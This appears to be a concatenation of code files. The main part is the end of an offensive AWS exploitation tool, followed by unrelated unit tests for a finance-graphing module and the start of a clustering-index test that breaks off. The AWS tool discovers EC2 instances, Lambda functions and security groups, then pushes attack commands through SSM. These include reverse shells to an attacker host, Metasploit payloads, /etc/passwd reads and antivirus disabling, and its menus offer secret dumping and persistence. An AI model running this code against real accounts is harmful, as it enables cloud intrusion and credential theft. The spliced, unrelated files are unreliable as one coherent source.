linux = True
else:
windows = True
except Exception as e:
print(e)
puts(color('[!] You have no stored EC2 instances. Run the command attacksurface to discover them'))
go_to_menu(caller)
print(instances_table)
puts(color('[*] Target Options:'))
target_options = [{'selector':'1','prompt':'All EC2 instances','return':'all'},
{'selector':'2', 'prompt':'Single EC2 instance', 'return':'single'}]
target = prompt.options('Choose your target:', target_options)
if target == 'single':
#paster
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(instanceidcomplete)
target = prompt.query('Type/Paste your target EC2 ID:')
if target == "all":
agree = prompt.query('This is will launch the same attack on all EC2 instances. This is a very risk move! Do you want to proceed? Y/N?', default="N")
if agree != 'Y':
go_to_menu(caller)
puts(color('[*] EC2 Attack List:'))
attack_options = [{'selector':'1','prompt':'Download EC2 metadata and userdata (custom init script)','return':'metadata'},
{'selector':'2', 'prompt':'Display a file', 'return':'printfile'},
{'selector':'3','prompt':'Visit a URL from inside EC2 instance','return':'URL'},
{'selector':'4','prompt':'metasploit','return':'msf'},
{'selector':'5','prompt':'Run a command','return':'command'},
{'selector':'6','prompt':'Reverse Shell to external server','return':'reverseshell'}]
attack = prompt.options('Choose your attack mode:', attack_options)
if target != 'all':
success = attack_single_target(caller,target, attack)
elif target == "all":
targets = actual_targets
success = attack_multiple_targets(mysession,caller,targets, attack, linux, windows)
puts(color('[+] Done launching attacks. Check command results with commandresults option.'))
go_to_menu(caller)
def attack_single_target(caller,target, attack):
"""
Launch an attack on a single EC2 instance.
:param caller: Calling menu to return to.
:param target: Target EC2 instance id
:param attack: The attack to launch.
:return: True
"""
global ec2instances
target_id = ''
target_platform = ''
target_state = ''
target_region = ''
disableav = False
for ins in ec2instances['instances']:
if ins.get('id') == target:
target_id = target
target_platform = ins.get('platform')
target_state = ins.get('state')
target_region = ins.get('region')
if target_state != 'running':
puts(color('[!] The chosen target is not running! Exiting...'))
go_to_menu(caller)
if target_platform == 'linux':
action = 'AWS-RunShellScript'
else:
action = 'AWS-RunPowerShellScript'
remote_ip_host = ''
remote_port = ''
if attack == "reverseshell" or attack == "msf":
puts(colored.magenta('You chose %s option. First provide your remote IP and port to explore shell options.' %attack))
remote_ip_host = prompt.query('Your remote IP or hostname to connect back to:')
remote_port = prompt.query("Your remote port number:", default="4444")
if attack == "reverseshell":
attack, action = reverseshell_options(remote_ip_host, remote_port, target_platform)
elif attack == "msf":
attack, action = metasploit_installed_options(remote_ip_host, remote_port, target_platform)
disableav = True
elif attack == 'URL':
puts(color('[*] Choose the URL to visit from inside the EC2 instance:'))
URL = prompt.query('URL: ', default="http://169.254.169.254/latest/")
if target_platform == 'linux':
attack = "python -c \"import requests; print requests.get('%s').text;\"" %URL
else:
attack = "echo (Invoke-WebRequest -UseBasicParsing -Uri ('%s')).Content;" %URL
elif attack == "metadata":
if target_platform == 'linux':
attack = PRINT_EC2_METADATA_CMD
else:
attack = PRINT_EC2_METADATA_PSH
elif attack == "printfile":
filepath = prompt.query('Enter the full file path: ', default="/etc/passwd")
attack = "cat %s" %filepath
elif attack == "command":
attack = prompt.query('Enter the full command to run: (bash for Linux - Powershell for Windows)', default="cat /etc/passwd")
disableav = True
puts(colored.cyan('Sending the command "%s" to the target instance %s....'%(attack,target)))
mysession = set_session_region(target_region)
ssmclient = mysession.client('ssm')
if target_platform == 'linux':
success = run_linux_command(ssmclient,target,action,attack)
else:
success = run_windows_command(ssmclient,target, action, attack, disableav)
return True
def attack_multiple_targets(mysession,caller,targets, attack, linux, windows):
"""
Launch commands against multiple EC2 instances
:param mysession: boto3 session object.
:param caller: calling menu to return to.
:param targets: List of target EC2 instances
:param attack: The attack/command type
:param linux: Whether or not Linux is included in the targets.
:param windows: Whether or not Windows is included in the targets.
:return: None
"""
global command_invocations
global logger
windowsaction = 'AWS-RunPowerShellScript'
linuxaction = 'AWS-RunShellScript'
disableav = False
if attack == "reverseshell" or attack == "msf":
puts(colored.magenta('Make sure your shell listener tool can handle multiple simultaneous connections!'))
disableav = True
if attack == "reverseshell":
linuxattack, windowsattack = reverseshell_multiple_options(linux, windows)
elif attack == "msf":
linuxattack, windowsattack = metasploit_installed_multiple_options(linux, windows)
elif attack == "URL":
puts(color('[*] Choose the URL to visit from inside the EC2 instances:'))
URL = prompt.query('URL: ', default="http://169.254.169.254/latest/")
linuxattack = "python -c \"import requests; print requests.get('%s').text;\"" %URL
windowsattack = "echo (Invoke-WebRequest -UseBasicParsing -Uri ('%s')).Content;" %URL
elif attack == "metadata":
linuxattack = PRINT_EC2_METADATA_CMD
windowsattack = PRINT_EC2_METADATA_PSH
elif attack == "printfile":
linuxfilepath = prompt.query('(Ignore if linux is not targeted)Enter the full file path for Linux instances: ', default="/etc/passwd")
windowsfilepath = prompt.query('(Ignore if Windows is not targeted)Enter the full file path for Windows instances: ', default="C:\\Windows\\System32\\drivers\\etc\\hosts")
linuxattack = "cat %s" %linuxfilepath
windowsattack = "cat %s" %windowsfilepath
elif attack == "command":
linuxattack = prompt.query('(Ignore if linux is not targeted)Enter the full bash command to run: ', default="whoami")
windowsattack = prompt.query('(Ignore if Windows is not targeted)Enter the full Powershell command to run: ', default="whoami")
disableav = True
logger.error("before running threaded attacks")
for target in targets:
if target['platform'] == 'linux' and linux and target.get('iam_profile','') != '' and linuxattack != '':
#run_threaded_linux_command(mysession,target,linuxaction,linuxattack)
logger.error("running run_threaded_linux_command for %s" %target['id'])
linuxthread = Thread(target=run_threaded_linux_command, args=(mysession, target,linuxaction,linuxattack))
linuxthread.start()
logger.error("after running run_threaded_linux_command for %s" % target['id'])
if target['platform'] == 'windows' and windows and target.get('iam_profile','') != '' and windowsattack != '':
logger.error("running run_threaded_windows_command for %s" % target['id'])
#run_threaded_windows_command(mysession,target,windowsaction,windowsattack)
windowsthread = Thread(target=run_threaded_windows_command, args=(mysession, target,windowsaction,windowsattack,disableav))
windowsthread.start()
logger.error("after run_threaded_windows_command for %s" % target['id'])
#TODO: Decide best approach to launching and looping
#loop over instances launching attack against each
#loop over results.
def check_command_invocations(caller):
"""
Check stored results of previously executed attacks on EC2 instances.
:param caller: calling menu
:return: None
"""
global command_invocations
if len(command_invocations['commands']) < 1:
puts(color('[!] You don\'t have any commands run yet against EC2 targets. Run ec2attacks to launch commands.'))
go_to_menu(caller)
for command in command_invocations['commands']:
puts(colored.green('command id: %s'%command.get('id') ))
puts(colored.green('command instance id: %s'%command.get('instanceid') ))
puts(colored.green('command state: %s'%command.get('state')))
puts(colored.green('command platform: %s'%command.get('platform')))
puts(colored.green('command region: %s'%command.get('region') ))
try:
puts(colored.green('command error: %s'%command.get('error','No errors')[0:5000]))
except:
pass
try:
puts(colored.green('command output: %s'%command.get('output', 'No output')[0:5000] ))
except:
pass
puts(colored.magenta('======================================='))
def find_attacksurface(caller):
"""
Find the attack surface of this AWS account. Currently looks for EC2 instances and Security Groups.
:param caller: calling menu
:return: None
"""
global my_aws_creds
global ec2instances
global secgroups
global lambdafunctions
mysession = ''
try:
mysession = my_aws_creds['session']
possible_regions = my_aws_creds['possible_regions']
except:
puts(color("[!] Error! No AWS credentials set. Call setprofile first!"))
go_to_menu(caller)
ec2instances = {'instances':[]}
secgroups = {'groups':[]}
puts(color('[..] Now iterating over all regions to discover public attack surface...'))
for region in possible_regions:
puts(color('[*] Region currently searched for details: %s'%region))
#if my_aws_creds['aws_session_token'] == '':
# mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region)
#else:
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region,aws_session_token=my_aws_creds['aws_session_token'])
ec2resource = mysession.resource('ec2')
lambdaclient = mysession.client('lambda')
instances = ec2resource.instances.all()
puts(color('[..] Now searching for details of EC2 instances'))
for instance in instances:
puts(color('[..] Now checking instance with id: %s'%instance.instance_id))
puts(color('[+] Public host name: %s'%instance.public_dns_name))
puts(color('[+] Public IP: %s'%instance.public_ip_address))
platform = ''
if instance.platform == "windows":
platform = 'windows'
puts(color('[+] OS is: Windows'))
else:
platform = 'linux'
puts(color('[+] OS is: Linux'))
puts(color('[+] AMI id: %s'%instance.image_id))
puts(color('[+] State: %s'%instance.state['Name']))
puts(color('[+] Region: %s'%region))
profile = instance.iam_instance_profile
if profile:
profile = profile['Arn'].rsplit('/',1)[-1]
else:
profile = ''
puts(colored.magenta(''))
ec2instances['instances'].append({'id':instance.instance_id,'public_dns_name':instance.public_dns_name,'public_ip_address':instance.public_ip_address,
'platform':platform,'ami_id':instance.image_id,'state':instance.state['Name'],'region':region,'iam_profile':profile})
puts(color('[..] Now searching for details of security groups'))
security_groups = ec2resource.security_groups.all()
for group in security_groups:
thisgroup = {}
thisgroup['description'] = group.description
thisgroup['id'] = group.id
puts(colored.magenta("group id: %s" %group.id))
puts(colored.magenta( "group ip permissions"))
ip_permissions = []
for rule in group.ip_permissions:
ranges = ''
for iprange in rule.get('IpRanges',[]):
ranges = ranges + '%s,' %iprange['CidrIp']
if len(ranges) > 1 and ranges[-1] == ',':
ranges = ranges[:-1]
if ranges == '':
ranges = 'None'
protocol = rule.get('IpProtocol')
if ranges == '':
protocol = 'All'
fromport = rule.get('FromPort','Any')
toport = rule.get('ToPort','Any')
puts(colored.magenta( "Ingress Rule: fromport: %s, toport: %s, protocol: %s, IP ranges: %s" %(fromport,toport,protocol,ranges)))
ip_permissions.append({'protocol':protocol,'fromport':fromport, 'toport':toport,'ranges':rule.get('IpRanges',[])})
puts(colored.magenta( "group ip permissions egress"))
ip_permissions_egress = []
for rule in group.ip_permissions_egress:
ranges = ''
for iprange in rule.get('IpRanges',[]):
ranges = ranges + '%s,' %iprange['CidrIp']
if len(ranges) > 1 and ranges[-1] == ',':
ranges = ranges[:-1]
if ranges == '':
ranges = 'None'
protocol = rule.get('IpProtocol')
if ranges == '':
protocol = 'All'
fromport = rule.get('FromPort','Any')
toport = rule.get('ToPort','Any')
puts(colored.magenta( "Egress Rule: fromport: %s, toport: %s, protocol: %s, IP ranges: %s" %(fromport,toport,protocol,ranges)))
ip_permissions_egress.append({'protocol':protocol,'fromport':fromport, 'toport':toport,'ranges':rule.get('IpRanges',[])})
thisgroup['ip_permissions'] = ip_permissions
thisgroup['ip_permissions_egress'] = ip_permissions_egress
secgroups['groups'].append(thisgroup)
puts(color('[..] Now searching for details of lambda functions'))
function_results = lambdaclient.list_functions()
functions = function_results['Functions']
for function in functions:
function_name = function['FunctionName']
function_arn = function['FunctionArn']
function_runtime = function.get('Runtime','')
function_role = function.get('Role','')
function_description = function.get('Description','')
function_Environment = function.get('Environment',{})
puts(color('[+] Function Name: %s'%function_name))
puts(color('[+] Function ARN: %s'%function_arn))
puts(color('[+] Function Runtime: %s'%function_runtime))
puts(color('[+] Function Role: %s'%function_role))
puts(color('[+] Function Description: %s'%function_description))
puts(color('[+] Function Environment variables: %s'%function_Environment))
lambdafunctions['functions'].append({'name':function_name,'function_arn':function_arn,'function_runtime':function_runtime,
'function_role':function_role,'function_description':function_description,'function_Environment':function_Environment,'region':region})
go_to_menu(caller)
def set_aws_creds(caller):
"""
Set the AWS credentials of the targeted AWS account.
:param caller: Calling menu
:return: None
"""
global menu_stack
global my_aws_creds
readline.set_completer(None)
aws_access_key_id = getpass('Enter your AWS Access Key ID:')
puts(color("[*] Key id is: %s************%s"%(aws_access_key_id[0:2],aws_access_key_id[-3:-1])))
aws_secret_access_key = getpass('Enter AWS Secret Access Key:')
puts(color("[*] secret key is: %s************%s"%(aws_secret_access_key[0:2],aws_secret_access_key[-3:-1])))
aws_session_token = getpass("Enter your session token, only if needed: ")
if aws_session_token == '':
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name='us-west-2')
else:
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name='us-west-2', aws_session_token=aws_session_token)
ec2client = mysession.client('ec2')
regionresponse = ''
choose_your_region = False
possible_regions = []
try:
regionresponse = ec2client.describe_regions()
except Exception as e:
if "OptInRequired" in str(e):
puts(color("[!] OptInRequired Error: The keys are valid but you have a problem in your AWS account."
"Your account may be under validation by AWS. Is it a new account?"))
elif "UnauthorizedOperation" in str(e):
choose_your_region = True
else:
puts(color("[!] Error accessing AWS services. Double check your AWS keys, tokens, privileges and region."))
print(e)
if choose_your_region == False:
go_to_menu(caller)
if choose_your_region == True:
chosen_region = prompt.query('What is your preferred AWS region?',default='us-east-1')
else:
regions = regionresponse['Regions']
region_table = PrettyTable(['Region'])
possible_regions = []
for region in regions:
region_table.add_row([region['RegionName']])
possible_regions.append(region['RegionName'])
print(region_table)
chosen_region = prompt.query('What is your preferred AWS region?',default='us-east-1')
if chosen_region not in possible_regions:
puts(color("[!] Invalid AWS region! Exiting...."))
exit()
if aws_session_token == '':
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=chosen_region)
else:
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=chosen_region,aws_session_token=aws_session_token)
my_aws_creds = {'aws_access_key_id':aws_access_key_id,'aws_secret_access_key':aws_secret_access_key,'region_name':chosen_region,'aws_session_token':aws_session_token,'session':mysession,'possible_regions':possible_regions}
#menu_stack.append(caller)
#handle_menu()
go_to_menu(caller)#menu_backward()
def set_aws_creds_inline(aws_access_key_id,aws_secret_access_key,region_name,aws_session_token):
"""
Set AWS credentials to the target account from the command line arguments directly, no prompts.
:param aws_access_key_id: access key id
:param aws_secret_access_key: access secret key
:param region_name: region name
:param aws_session_token: token, if any
:return: None
"""
global my_aws_creds
if aws_session_token == '':
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=region_name)
else:
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=region_name, aws_session_token=aws_session_token)
ec2client = mysession.client('ec2')
regionresponse = ''
try:
regionresponse = ec2client.describe_regions()
except Exception as e:
if "OptInRequired" in str(e):
puts(color("[!] OptInRequired Error: The keys are valid but you have a problem in your AWS account."
"Your account may be under validation by AWS. Is it a new account?"))
else:
puts(color("[!] Error accessing AWS services. Double check your AWS keys, tokens, privileges and region."))
exit()
regions = regionresponse['Regions']
possible_regions = []
for region in regions:
possible_regions.append(region['RegionName'])
if region_name not in possible_regions:
puts(color("[!] Invalid AWS region! Exiting...."))
exit()
if aws_session_token == '':
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=region_name)
else:
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=region_name,aws_session_token=aws_session_token)
my_aws_creds = {'aws_access_key_id':aws_access_key_id,'aws_secret_access_key':aws_secret_access_key,'region_name':region_name,'aws_session_token':aws_session_token,'session':mysession,'possible_regions':possible_regions}
def show_aws_creds(caller):
"""
List AWS credentials used to connect to this AWS account.
:param caller: calling menu
:return: None
"""
global menu_stack
global my_aws_creds
if my_aws_creds == {}:
puts(color('[!] You haven\'t set your AWS credentials yet. Run the command setprofile to set them'))
#menu_stack.append(caller)
#handle_menu()
go_to_menu(caller)
try:
puts(color('[+] Your AWS credentials:'))
puts(color('[*] access key id: %s'%my_aws_creds['aws_access_key_id']))
puts(color('[*] secret access key: %s'%my_aws_creds['aws_secret_access_key']))
puts(color('[*] session token: %s'%my_aws_creds['aws_session_token']))
puts(color('[*] region: %s'%my_aws_creds['region_name']))
except:
puts(color('[!] You haven\'t set your AWS credentials yet. Run the command dumpsecrets to set them'))
#menu_stack.append(caller)
#handle_menu()
go_to_menu(caller)
def main_help():
"""
Display Main Menu help options.
:return: None
"""
print(""" Main Help menu
================
help - print this menu
where - find where you are in the program
back - Go back to the previous menu
exit - Exit the program
setprofile - Set your AWS credentials
showprofile - Show your AWS credentials
showsecrets - Show credentials and secrets acquired from the target AWS account
training - Go to training mode
dumpsecrets - Gather and dump credentials of EC2 in Secrets Manager and Parameter Store
attacksurface - Discover attack surface of target AWS account
addtosecgroups - Add IPs and ports to security groups
persistence - Add persistence and hide deeper
ec2instances - Go to EC2 instances menu
securitygroups - List all discovered Security Groups
""")
main_loop()
MAINCOMMANDS = ['help', 'where', 'back', 'exit', 'setprofile', 'showprofile', 'showsecrets',
'training','dumpsecrets','attacksurface','addtosecgroups','persistence','ec2instances','securitygroups']
def maincomplete(text, state):
"""
Autocomplete for the main menu commands.
"""
for cmd in MAINCOMMANDS:
if cmd.startswith(text):
if not state:
return cmd
else:
state -= 1
def training_help():
"""
Display command options for the training menu.
:return: None
"""
print(""" Training Help menu
================
help - print this menu
where - find where you are in the program
back - Go back to the previous menu
exit - Exit the program
setprofile - Set your AWS credentials
showprofile - Show your AWS credentials
start - Start training mode
""")
training_loop()
TRAININGCOMMANDS = ['help', 'where', 'back', 'exit', 'setprofile', 'showprofile', 'start']
def trainingcomplete(text, state):
"""
Autocomplete for training menu.
"""
for cmd in TRAININGCOMMANDS:
if cmd.startswith(text):
if not state:
return cmd
else:
state -= 1
def instances_help():
"""
Display command options for the EC2 instances menu.
:return:
"""
print(""" EC2 instances Help menu
================
help - print this menu
where - find where you are in the program
back - Go back to the previous menu
exit - Exit the program
setprofile - Set your AWS credentials
showprofile - Show your AWS credentials
showsecrets - Show credentials and secrets acquired from the target AWS account
ec2attacks - Launch attacks against running EC2 instances
list - List all discovered EC2 instances
dumpsecrets - Gather and dump credentials of EC2 in Secrets Manager and Parameter Store
attacksurface - Discover attack surface of target AWS account
securitygroups - List all discovered Security Groups
commandresults - Check command results
instance - Get more details about an instance
""")
instances_loop()
INSTANCESCOMMANDS = ['help', 'where', 'back', 'exit', 'setprofile', 'showprofile', 'showsecrets',
'ec2attacks','dumpsecrets','attacksurface','list','commandresults','securitygroups', 'instance']
def instancecomplete(text, state):
"""
Autocomplete for EC2 instances menu
"""
for cmd in INSTANCESCOMMANDS:
if cmd.startswith(text):
if not state:
return cmd
else:
state -= 1
asciilogo = """
.
:y-
:yy:
/ys/:`
/yo/::-
/y+/::::`
+y/+:::::-
+s:+:::::::`
`+s-+::::::::-
`oo.o/:::::::-`
`o+.o/::::::::
`o/`s/::::::/o:
`o:`s+::::::/sy`
.o-`s+-----::+++..........`
` .+.`so-------------------::` .`
``.--` .+``so-----:::::::::-----:-` oys+-.`
`..---..` ./ `ys----::/+++++oo/----:- .:+yhhyo:.`
`.----.`` .: `ys:---::+oyssooo+----::....``` .-+shhyo/-`
``.----.`` .- `yh+++++ooooo+//::----:. `` ` `-/oyhhs+:``
.----.` .. :/::-..`` `-----:--:/+o/ ` .:+ydhy:
.----.` .` `..-----/ssssss+ `. `.:oydhy:
``.----.` ` ``.-:/+os/----:+ysssss+ .- `-/oydhy+:.
``.----.`` `.--:/+ooossssy/----:+osssss+` -- `-+shhhs/-`
`..---..` ```` `-ooooosyys+/::ossoooo+` :- `:oyddyo:.
``.--` /oooosyyyysooosooooo+` /- shs+-`
`+ooooooooooooooooooo+` `+- `
.oooooooooooooooooooo+` .o-
.//////////yyyso+++++` -s-
yys++++++` :s-
oo++++++. /s-
`/++++++.`+o.
./++++++.`oo.
:////+/..so-
./////.:y+-
`////-/y+-
://-+y+-
./:oy+-
`/sy/-
oy/-
//-
`--. `-
-dd/
-dd/`-:-` `.----.` `..``---` `---``..
-ddysyhdy: :sooooys: /yyossss/ -sysoosyy`
-ddy` `ydh` ..---:sys /yy+` `` `yyo` `syy`
-dd+ odd. .oyyo++yyy /yy. .yy/ +yy`
-ddy``.hdh /yy: `yyy /yy. `yys```syy`
-hhsyyhhy- .sys++osyy /yy. -syyossyy`
`..``--. ..-. ... `.. .-. +yy`
+yy`
`..
"""
start()
``` |
{
"source": "johnvorsten/Finance-Calculator",
"score": 3
} |
#### File: Finance-Calculator/finance-graph/finance_graphing_test.py
```python
import datetime, unittest, re
# Third party imports
import numpy as np
# Local imports
from finance_graphing import (create_transaction_objects, Income,
plot_integral, calculate_gradients)
#%%
class Testing(unittest.TestCase):
def test_gradients_values(self):
# 10 dollars a day
inc1 = Income(10, 1/365, datetime.date(2020,1,1), datetime.date(2020,1,5))
# Single 10 dollar expense
inc2 = Income(-20, 1/365, datetime.date(2020,1,2), datetime.date(2020,1,2), one_time=True)
# Calculate gradients over days
start_date = datetime.date(2020,1,1)
end_date = datetime.date(2020,1,5)
incomes = [inc1, inc2]
gradients, values = calculate_gradients(incomes, start_date, end_date)
"""Gradients should look like this
array([[[ 10., 10., 10., 10., 10., 10., 10., 10., 10., 10., 10.]],
[[-10., -10., -10., -10., -10., -10., -10., -10., -10., -10., -10.]],
[[ 10., 10., 10., 10., 10., 10., 10., 10., 10., 10., 10.]],
[[ 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.]]])"""
test_gradient =np.array([[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]],
[[-10., -10.,-10.,-10.,-10.,-10.,-10.,-10.,-10.,-10.,-10.]],
[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]],
[[ 0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]]])
test_values = np.array([[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]],
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]],
[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]]])
self.assertTrue(np.array_equal(test_gradient, test_gradient))
self.assertTrue(np.array_equal(test_values, test_values))
return None
def test_dates(self):
# 10 dollars a day
inc1 = Income(10, 1/365,
datetime.date(2020,1,1), datetime.date(2020,1,5))
# Single 10 dollar expense
inc2 = Income(-20, 1/365,
datetime.date(2020,1,2), datetime.date(2020,1,2), one_time=True)
# A range of dates should not be an issue
self.assertTrue(inc1.start_date == datetime.date(2020,1,1))
self.assertTrue(inc1.end_date == datetime.date(2020,1,5))
# One-time expenses should range multiple days even if it occurs on one day
# This is because a gradient needs to be calculated between days
self.assertTrue(inc2.start_date == datetime.date(2020,1,2))
self.assertTrue(inc2.end_date == datetime.date(2020,1,3))
return None
def test_income_gradient(self):
# 10 dollars a day
inc1 = Income(10, 1/365,
datetime.date(2020,1,1), datetime.date(2020,1,5))
# Single 10 dollar expense
inc2 = Income(-20, 1/365,
datetime.date(2020,1,2), datetime.date(2020,1,2), one_time=True)
# Test gradient
gradient1 = inc1.calc_derivative()
gradient2 = inc2.calc_derivative()
self.assertTrue(np.array_equal(gradient1, np.array([float(10)] * 11)))
self.assertTrue(np.array_equal(gradient2, np.array([float(-20)] * 11)))
return None
def test_calc_gradients(self):
# 10 dollars a day
inc1 = Income(10, 1/365, datetime.date(2020,1,1), datetime.date(2020,1,5))
# Single 10 dollar expense
inc2 = Income(-20, 1/365,
datetime.date(2020,1,2), datetime.date(2020,1,2), one_time=True)
# Test gradient
start_date = datetime.date(2020,1,1)
end_date = datetime.date(2020,1,5)
gradients1, values1 = calculate_gradients([inc1,inc2], start_date, end_date)
gradients_test1=np.array([[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]],
[[-10.,-10.,-10.,-10.,-10.,-10.,-10.,-10.,-10.,-10.,-10.]],
[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]],
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]]])
values_test1=np.array([[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]],
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]],
[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]]])
# Test gradient
start_date = datetime.date(2019,12,31)
end_date = datetime.date(2020,1,3)
gradients2, values2 = calculate_gradients([inc1,inc2], start_date, end_date)
gradients_test2=np.array([[
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]],
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]]])
values_test2=np.array([[
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]],
[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]]])
self.assertTrue(np.array_equal(gradients1, gradients_test1))
self.assertTrue(np.array_equal(values1, values_test1))
self.assertTrue(np.array_equal(gradients2, gradients_test2))
self.assertTrue(np.array_equal(values2, values_test2))
return None
def test_income_probability(self):
# 10 dollars a day
inc1 = Income(10, 1/365, datetime.date(2020,1,1), datetime.date(2020,1,5))
# Confirm the default probability
a = np.array([1. , 0.9, 0.8, 0.7, 0.6, 0.5,0.4,0.3, 0.2, 0.1,0.])
self.assertTrue(np.array_equal(inc1.probability, a))
# Confirm custom probability
probability=[1,0.98,0.9,0.85,0.8,0.75,0.70,0.68,0.65,0.5,0.45]
inc2 = Income(10, 1/365, datetime.date(2020,1,1), datetime.date(2020,1,5),
probability=probability)
self.assertTrue(np.array_equal(inc2.probability, probability))
return None
def test_best_worst_case(self):
# Income of $100 to $50 over 10 days
period = 10/365
start_date=datetime.date(2020,1,1)
end_date=datetime.date(2020,1,2)
best_case = 100
worst_case = 50
inc1 = Income(income=100, period=period,
start_date=start_date, end_date=end_date,
best_case=best_case, worst_case=worst_case)
daily_gradient = inc1.calc_derivative()
value = (best_case - worst_case) * inc1.probability + worst_case
daily_gradient_test = value / (period * 365)
self.assertTrue(np.array_equal(daily_gradient,daily_gradient_test))
return None
def test_regex_match(self):
"""# TODO
This regex is weak. Lots of the test cases will output odd numbers.
I would have to test for lots of conditionals like
If more that (2) '.' appear in the string sequence
A number shouldn't be represnted like 2.334.05 (other countries maybe?)
If numbers are interrupted by characters other than ',' or '.'
This is not a valid number : 24A33.05
Even or odd numbers
This is negative : (5.45)
This is negative : -5.45
This is something : -(5.45)
This is positive : 5.45
This is positive : +5.45
Is the data formatted where 5.45 is a transaction out of account or into
account?
This is transaction out of account : -5.45
Or is this? : 5.45
"""
reg = re.compile('[^0-9.-]')
s1 = 'name ni4nvi $03,200.40'
s2 = '(-$32,43.22)'
s3 = '$4,300.00'
s4 = '-$4,300.00'
s5 = '+3i2nndfs!@#$%^&*()2.jnfinn%55'
s6 = '#4,304'
s7 = '#4.334455.0040'
s8 = ''
s9 = ''
s10 = ''
test_case = [s1,s2,s3,s4,s5,s6,s7,s8,s9,s10]
for test in test_case:
result = re.sub(reg, '', test)
print(result)
return None
if __name__ == '__main__':
unittest.main()
"""
~~ Order Filtering ~~
Domain acts as a mask over each pixel of x
For every non-zero element in the mask of x, a list is constructed
The list is sorted, and the 'rank' element from the list is selected
from scipy import signal
x = np.arange(25).reshape(5, 5)
domain = np.identity(3)
signal.order_filter(x, domain, 0)
signal.order_filter(x, domain, 1)
signal.order_filter(x, domain, 2)
Example 1
rank = 1
domain = [[1., 0., 0.],
[0., 1., 0.],
[0., 0., 1.]]
x = [[ 0, 1, 2, 3, 4],
[ 5, 6, 7, 8, 9],
[10, 11, 12, 13, 14],
[15, 16, 17, 18, 19],
[20, 21, 22, 23, 24]]
For element [0,0] the domain mask is centered, and the non-masked elements
are [0,0,6] (elements are zero when the mask is off of x).
Since rank is 1, the 1st element from the list is selected (0).
For element [1,2] the domain mask is centered, and the non-masked elements
are [1,7,13].
Since rank is 1, the 1st element from the list is selected (7).
~~ Median filter ~~
Same idea as above, but the median of the list is chosen
from scipy import signal
x = np.arange(25).reshape(5, 5)
kernel_size = 3
signal.medfilt(x, kernel_size=kernel_size)
Element [1,0]
Elements in list are [0, 0, 0, 0, 1, 5, 6, 10, 11]
The median of the list is 1
"""
``` |
{
"source": "johnvorsten/py_cindex",
"score": 3
} |
#### File: src/tests/c_index_R_interface_test.py
```python
import unittest
# Third party imports
import numpy as np
from sklearn.datasets import make_blobs
# Local imports
from c_index.c_index import (
calc_c_index, simple_cluster_points)
from c_index.c_index_R_interface import (
calc_c_index_clusterCrit,
calc_c_index_clusterSim)
#%%
class Test(unittest.TestCase):
def __init__(self, *args, **kwargs):
"""Generate some dummy data for testing
X is an (nxm) array where n is the number of data points and m is
the feature space of each data point"""
super(Test, self).__init__(*args, **kwargs)
# Generate some data
xs = np.array([[1,2,1.5,1.75,1.33,0.88],
[5,5.5,4.88,6.33,5.01,4.95]]) # Cluster 1, 2 x values
ys = np.array([[8.9,8.5,7.89,8.25,8.85,8.29],
[1.25,1.14,1.85,0.85,0.79,0.96]]) # Cluster 1,2 y values
self.X = np.stack((xs.ravel(),ys.ravel()), axis=1)
# True labels for points in X
self.cluster_labels = np.array([0,0,0,0,0,0,1,1,1,1,1,1])
return None
def test_calc_cindex_clusterCrit(self):
X = self.X
cluster_labels = self.cluster_labels + 1
# Calculate Cindex from clusterCrit package...
res = calc_c_index_clusterCrit(X, cluster_labels)
cindex = res['c_index'][0]
self.assertTrue(isinstance(cindex, float))
return None
def test_calc_cindex_clusterSim(self):
cluster_labels = self.cluster_labels + 1
# Calculate Cindex from clusterSim package...
cindex = calc_c_index_clusterSim(self.X, cluster_labels)
self.assertTrue(isinstance(cindex, float))
return None
if __name__ == '__main__':
unittest.main()
#%% Example 1
def example_1():
import matplotlib.pyplot as plt
# Generate some data
xs = np.array([[1,2,1.5,1.75,1.33,0.88],
[5,5.5,4.88,6.33,5.01,4.95]]) # Cluster 1, 2 x values
ys = np.array([[8.9,8.5,7.89,8.25,8.85,8.29],
